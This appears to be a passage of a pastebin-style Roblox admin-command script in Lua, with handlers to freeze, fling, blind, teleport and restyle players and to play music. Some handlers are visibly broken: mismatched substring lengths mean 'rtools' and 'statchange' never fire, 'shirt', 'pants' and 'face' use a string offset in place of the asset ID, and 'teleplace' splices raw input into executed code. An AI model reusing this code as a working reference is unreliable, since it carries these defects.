  1256. for i, v in pairs(plrz) do
  1257. coroutine.resume(coroutine.create(function()
  1258. if v and v.Character and v.Character:findFirstChild("Torso") then
  1259. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1260. end
  1261. end))
  1262. end
  1263. end
  1264.  
  1265. if Cmd.Text:lower():sub(1,5) == "stun " then
  1266. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1267. for i, v in pairs(plrz) do
  1268. coroutine.resume(coroutine.create(function()
  1269. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1270. v.Character.Humanoid.PlatformStand = true
  1271. end
  1272. end))
  1273. end
  1274. end
  1275.  
  1276. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1277. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1278. for i, v in pairs(plrz) do
  1279. coroutine.resume(coroutine.create(function()
  1280. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1281. v.Character.Humanoid.PlatformStand = false
  1282. end
  1283. end))
  1284. end
  1285. end
  1286.  
  1287. if Cmd.Text:lower():sub(1,5) == "jump " then
  1288. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1289. for i, v in pairs(plrz) do
  1290. coroutine.resume(coroutine.create(function()
  1291. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1292. v.Character.Humanoid.Jump = true
  1293. end
  1294. end))
  1295. end
  1296. end
  1297.  
  1298. if Cmd.Text:lower():sub(1,4) == "sit " then
  1299. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1300. for i, v in pairs(plrz) do
  1301. coroutine.resume(coroutine.create(function()
  1302. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1303. v.Character.Humanoid.Sit = true
  1304. end
  1305. end))
  1306. end
  1307. end
  1308.  
  1309. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1310. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1311. for i, v in pairs(plrz) do
  1312. coroutine.resume(coroutine.create(function()
  1313. if v and v.Character then
  1314. for a, obj in pairs(v.Character:children()) do
  1315. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1316. end
  1317. end
  1318. end))
  1319. end
  1320. end
  1321.  
  1322. if Cmd.Text:lower():sub(1,8) == "visible " then
  1323. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1324. for i, v in pairs(plrz) do
  1325. coroutine.resume(coroutine.create(function()
  1326. if v and v.Character then
  1327. for a, obj in pairs(v.Character:children()) do
  1328. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1329. end
  1330. end
  1331. end))
  1332. end
  1333. end
  1334.  
  1335.  
  1336.  
  1337. if Cmd.Text:lower():sub(1,5) == "fire " then
  1338. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1339. for i, v in pairs(plrz) do
  1340. coroutine.resume(coroutine.create(function()
  1341. if v and v.Character and v.Character:findFirstChild("Torso") then
  1342. local cl = Instance.new("Fire", v.Character.Torso)
  1343. end
  1344. end))
  1345. end
  1346. end
  1347.  
  1348. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1349. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1350. for i, v in pairs(plrz) do
  1351. coroutine.resume(coroutine.create(function()
  1352. if v and v.Character and v.Character:findFirstChild("Torso") then
  1353. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1354. end
  1355. end))
  1356. end
  1357. end
  1358.  
  1359. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1360. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1361. for i, v in pairs(plrz) do
  1362. coroutine.resume(coroutine.create(function()
  1363. if v and v.Character and v.Character:findFirstChild("Torso") then
  1364. local cl = Instance.new("Smoke", v.Character.Torso)
  1365. end
  1366. end))
  1367. end
  1368. end
  1369.  
  1370. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1371. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1372. for i, v in pairs(plrz) do
  1373. coroutine.resume(coroutine.create(function()
  1374. if v and v.Character and v.Character:findFirstChild("Torso") then
  1375. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1376. end
  1377. end))
  1378. end
  1379. end
  1380.  
  1381. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1382. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1383. for i, v in pairs(plrz) do
  1384. coroutine.resume(coroutine.create(function()
  1385. if v and v.Character and v.Character:findFirstChild("Torso") then
  1386. local cl = Instance.new("Sparkles", v.Character.Torso)
  1387. end
  1388. end))
  1389. end
  1390. end
  1391.  
  1392. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1393. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1394. for i, v in pairs(plrz) do
  1395. coroutine.resume(coroutine.create(function()
  1396. if v and v.Character and v.Character:findFirstChild("Torso") then
  1397. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1398. end
  1399. end))
  1400. end
  1401. end
  1402.  
  1403. if Cmd.Text:lower():sub(1,3) == "ff " then
  1404. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1405. for i, v in pairs(plrz) do
  1406. coroutine.resume(coroutine.create(function()
  1407. if v and v.Character then Instance.new("ForceField", v.Character) end
  1408. end))
  1409. end
  1410. end
  1411.  
  1412. if Cmd.Text:lower():sub(1,5) == "unff " then
  1413. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1414. for i, v in pairs(plrz) do
  1415. coroutine.resume(coroutine.create(function()
  1416. if v and v.Character then
  1417. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1418. end
  1419. end))
  1420. end
  1421. end
  1422.  
  1423. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1424. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1425. for i, v in pairs(plrz) do
  1426. coroutine.resume(coroutine.create(function()
  1427. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1428. for a, obj in pairs(v.Character:children()) do
  1429. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1430. end
  1431. end
  1432. end))
  1433. end
  1434. end
  1435.  
  1436. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1437. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1438. for i, v in pairs(plrz) do
  1439. coroutine.resume(coroutine.create(function()
  1440. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1441. for a, obj in pairs(v.Character:children()) do
  1442. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1443. end
  1444. end
  1445. end))
  1446. end
  1447. end
  1448.  
  1449.  
  1450.  
  1451. if Cmd.Text:lower():sub(1,4) == "god " then
  1452. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1453. for i, v in pairs(plrz) do
  1454. coroutine.resume(coroutine.create(function()
  1455. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1456. v.Character.Humanoid.MaxHealth = math.huge
  1457. v.Character.Humanoid.Health = 9e9
  1458. end
  1459. end))
  1460. end
  1461. end
  1462.  
  1463. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1464. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1465. for i, v in pairs(plrz) do
  1466. coroutine.resume(coroutine.create(function()
  1467. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1468. v.Character.Humanoid.MaxHealth = 100
  1469. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1470. end
  1471. end))
  1472. end
  1473. end
  1474.  
  1475. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1476. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1477. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1478. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1479. end
  1480.  
  1481. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1482. game.Lighting.Brightness = Cmd.Text:sub(12)
  1483. end
  1484.  
  1485. if Cmd.Text:lower():sub(1,5) == "time " then
  1486. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1487. end
  1488.  
  1489. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1490. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1491. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1492. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1493. end
  1494.  
  1495. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1496. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1497. end
  1498.  
  1499. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1500. game.Lighting.FogStart = Cmd.Text:sub(10)
  1501. end
  1502.  
  1503.  
  1504.  
  1505. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1506. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1507. for i, v in pairs(plrz) do
  1508. coroutine.resume(coroutine.create(function()
  1509. if v and v.Character and v:findFirstChild("Backpack") then
  1510. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1511. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1512. end
  1513. end))
  1514. end
  1515. end
  1516.  
  1517.  
  1518.  
  1519.  
  1520.  
  1521.  
  1522.  
  1523. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1524. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1525. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1526. for i, v in pairs(plrz) do
  1527. coroutine.resume(coroutine.create(function()
  1528. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1529. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1530. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1531. end
  1532. end))
  1533. end
  1534. end
  1535.  
  1536. if Cmd.Text:lower():sub(1,6) == "speed " then
  1537. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1538. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1539. for i, v in pairs(plrz) do
  1540. coroutine.resume(coroutine.create(function()
  1541. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1542. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1543. end
  1544. end))
  1545. end
  1546. end
  1547.  
  1548.  
  1549. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1550. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1551. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1552. for i, v in pairs(plrz) do
  1553. coroutine.resume(coroutine.create(function()
  1554. if v and v:findFirstChild("PlayerGui") then
  1555. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1556. end
  1557. end))
  1558. end
  1559. end
  1560.  
  1561. if Cmd.Text:lower():sub(1,3) == "tp " then
  1562. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1563. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1564. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1565. for i, v in pairs(plrz) do
  1566. coroutine.resume(coroutine.create(function()
  1567. for i2, v2 in pairs(plrz2) do
  1568. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1569. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1570. end
  1571. end
  1572. end))
  1573. end
  1574. end
  1575.  
  1576. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1577. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1578. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1579. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1580. for i, v in pairs(plrz) do
  1581. coroutine.resume(coroutine.create(function()
  1582. if v and v:findFirstChild("leaderstats") then
  1583. for a, st in pairs(v.leaderstats:children()) do
  1584. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1585. end
  1586. end
  1587. end))
  1588. end
  1589. end
  1590.  
  1591. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1592. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1593. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1594. for i, v in pairs(plrz) do
  1595. coroutine.resume(coroutine.create(function()
  1596. if v and v.Character then
  1597. for i,v in pairs(v.Character:children()) do
  1598. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1599. end
  1600. end
  1601. end))
  1602. end
  1603. end
  1604.  
  1605. if Cmd.Text:lower():sub(1,6) == "pants " then
  1606. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1607. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1608. for i, v in pairs(plrz) do
  1609. coroutine.resume(coroutine.create(function()
  1610. if v and v.Character then
  1611. for i,v in pairs(v.Character:children()) do
  1612. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1613. end
  1614. end
  1615. end))
  1616. end
  1617. end
  1618.  
  1619. if Cmd.Text:lower():sub(1,5) == "gear " then
  1620. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1621. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1622. for i, v in pairs(plrz) do
  1623. if Cmd.Text:lower():sub(6) == "all" then return end
  1624. if Cmd.Text:lower():sub(6) == "others"then return end
  1625. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1626. coroutine.resume(coroutine.create(function()
  1627. if v and v:findFirstChild("Backpack") then
  1628. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1629. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1630. obj:Destroy()
  1631. end
  1632. end))
  1633. end
  1634. end
  1635.  
  1636. if Cmd.Text:lower():sub(1,5) == "face " then
  1637. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1638. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1639. for i, v in pairs(plrz) do
  1640. coroutine.resume(coroutine.create(function()
  1641. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1642. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1643. end
  1644. end))
  1645. end
  1646. end
  1647.  
  1648.  
  1649.  
  1650.  
  1651.  
  1652.  
  1653. if Cmd.Text:lower():sub(1,6) == "music " then
  1654. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1655. local id = Cmd.Text:sub(7)
  1656. local pitch = 1
  1657. if tostring(id):lower():find("caramell") then id = 2303479 end
  1658. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1659. if tostring(id):find("rick") then id = 2027611 end
  1660. if tostring(id):find("halo") then id = 1034065 end
  1661. if tostring(id):find("pokemon") then id = 1372261 end
  1662. if tostring(id):find("cursed") then id = 1372257 end
  1663. if tostring(id):find("extreme") then id = 11420933 end
  1664. if tostring(id):find("awaken") then id = 27697277 end
  1665. if tostring(id):find("alone") then id = 27697392 end
  1666. if tostring(id):find("mario") then id = 1280470 end
  1667. if tostring(id):find("choir") then id = 1372258 end
  1668. if tostring(id):find("chrono") then id = 1280463 end
  1669. if tostring(id):find("dotr") then id = 11420922 end
  1670. if tostring(id):find("entertain") then id = 27697267 end
  1671. if tostring(id):find("fantasy") then id = 1280473 end
  1672. if tostring(id):find("final") then id = 1280414 end
  1673. if tostring(id):find("emblem") then id = 1372259 end
  1674. if tostring(id):find("flight") then id = 27697719 end
  1675. if tostring(id):find("banjo") then id = 27697298 end
  1676. if tostring(id):find("gothic") then id = 27697743 end
  1677. if tostring(id):find("hiphop") then id = 27697735 end
  1678. if tostring(id):find("intro") then id = 27697707 end
  1679. if tostring(id):find("mule") then id = 1077604 end
  1680. if tostring(id):find("film") then id = 27697713 end
  1681. if tostring(id):find("nezz") then id = 8610025 end
  1682. if tostring(id):find("angel") then id = 1372260 end
  1683. if tostring(id):find("resist") then id = 27697234 end
  1684. if tostring(id):find("schala") then id = 5985787 end
  1685. if tostring(id):find("organ") then id = 11231513 end
  1686. if tostring(id):find("tunnel") then id = 9650822 end
  1687. if tostring(id):find("spanish") then id = 5982975 end
  1688. if tostring(id):find("venom") then id = 1372262 end
  1689. if tostring(id):find("wind") then id = 1015394 end
  1690. if tostring(id):find("guitar") then id = 5986151 end
  1691. if tostring(id):find("fox") then id = 130797915 end
  1692. if tostring(id):find("gangnam") then id = 130844430 end
  1693. if tostring(id):find("nyan") then id = 130786686 end
  1694. if tostring(id):find("harlem") then id = 131154740 end
  1695. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1696. end
  1697.  
  1698. if Cmd.Text:lower() == "stopmusic" then
  1699. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1700. end
  1701.  
  1702. if Cmd.Text:lower() == "musiclist" then
  1703. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1704. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1705. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1706. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1707. end
  1708.  
  1709.  
  1710. if Cmd.Text:lower():sub(1,5) == "spin " then
  1711. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1712. for i, v in pairs(plrz) do
  1713. coroutine.resume(coroutine.create(function()
  1714. if v and v.Character and v.Character:findFirstChild("Torso") then
  1715. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1716. local torso = v.Character:findFirstChild("Torso")
  1717. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1718. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1719. until not bg or bg.Parent ~= torso
  1720. end
  1721. end))
  1722. end
  1723. end
  1724.  
  1725. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1726. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1727. for i, v in pairs(plrz) do
  1728. coroutine.resume(coroutine.create(function()
  1729. if v and v.Character and v.Character:findFirstChild("Torso") then
  1730. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1731. end
  1732. end))
  1733. end
  1734. end
  1735.  
  1736.  
  1737.  
  1738. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1739. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1740. for i, v in pairs(plrz) do
  1741. coroutine.resume(coroutine.create(function()
  1742. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1743. end))
  1744. end
  1745. end
  1746.  
  1747. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1748. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1749. for i, v in pairs(plrz) do
  1750. coroutine.resume(coroutine.create(function()
  1751. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1752. end))
  1753. end
  1754. end
  1755.  
  1756. if Cmd.Text:lower():sub(1,6) == "fling " then
  1757. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1758. for i, v in pairs(plrz) do
  1759. coroutine.resume(coroutine.create(function()
  1760. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1761. local xran local zran
  1762. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1763. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1764. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1765. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1766. end
  1767. end))
  1768. end
  1769. end
  1770.  
  1771. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1772. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1773. for i, v in pairs(plrz) do
  1774. coroutine.resume(coroutine.create(function()
  1775. if v and v.Character then
  1776. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1777. end
  1778. end))
  1779. end
  1780. end
  1781.  
  1782. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1783. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1784. for i, v in pairs(plrz) do
  1785. coroutine.resume(coroutine.create(function()
  1786. if v and v.Character then
  1787. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1788. wait(.1) v.Character.Humanoid.PlatformStand = false
  1789. end
  1790. end))
  1791. end
  1792. end
  1793.  
  1794. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1795. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1796. for i, v in pairs(plrz) do
  1797. coroutine.resume(coroutine.create(function()
  1798. if v and v.Character then
  1799. for a, obj in pairs(v.Character:children()) do
  1800. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1801. end
  1802. end
  1803. end))
  1804. end
  1805. end
  1806.  
  1807.  
  1808. if Cmd.Text:lower():sub(1,5) == "char " then
  1809. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1810. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1811. for i, v in pairs(plrz) do
  1812. coroutine.resume(coroutine.create(function()
  1813. if v and v.Character then
  1814. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1815. v:LoadCharacter()
  1816. end
  1817. end))
  1818. end
  1819. end
  1820.  
  1821. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1822. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1823. for i, v in pairs(plrz) do
  1824. coroutine.resume(coroutine.create(function()
  1825. if v and v.Character then
  1826. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1827. v:LoadCharacter()
  1828. end
  1829. end))
  1830. end
  1831. end
  1832.  
  1833.  
  1834.  
  1835. if Cmd.Text:lower():sub(1,7) == "normal " then
  1836. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1837. for i, v in pairs(plrz) do
  1838. coroutine.resume(coroutine.create(function()
  1839. if v and v.Character and v.Character:findFirstChild("Torso") then
  1840. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1841. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1842. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1843. v.Character.Torso.Transparency = 0
  1844. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1845. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1846. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1847. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1848. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1849. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1850. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1851. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1852. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1853. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1854. end end
  1855. end
  1856. end))
  1857. end
  1858. end
  1859.  
  1860. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1861. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1862. for i, v in pairs(plrz) do
  1863. coroutine.resume(coroutine.create(function()
  1864. if v and v:findFirstChild("PlayerGui")then
  1865. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1866. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1867. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1868. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1869. end
  1870. end))
  1871. end
  1872. end
  1873.  
  1874. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1875. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1876. for i, v in pairs(plrz) do
  1877. coroutine.resume(coroutine.create(function()
  1878. if v and v:findFirstChild("PlayerGui") then
  1879. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1880. end
  1881. end))
  1882. end
  1883. end
  1884.  
  1885.  
  1886. if Cmd.Text:lower():sub(1,6) == "blind " then
  1887. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1888. for i, v in pairs(plrz) do
  1889. coroutine.resume(coroutine.create(function()
  1890. if v and v:findFirstChild("PlayerGui") then
  1891. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1892. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1893. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1894. end
  1895. end))
  1896. end
  1897. end
  1898.  
  1899. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1900. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1901. for i, v in pairs(plrz) do
  1902. coroutine.resume(coroutine.create(function()
  1903. if v and v:findFirstChild("PlayerGui") then
  1904. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1905. end
  1906. end))
  1907. end
  1908. end
  1909.  
  1910. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1911. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1912. for i, v in pairs(plrz) do
  1913. coroutine.resume(coroutine.create(function()
  1914. if v and v:findFirstChild("PlayerGui") then
  1915. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1916. end
  1917. end))
  1918. end
  1919. end
  1920.  
  1921. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1922. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1923. for i, v in pairs(plrz) do
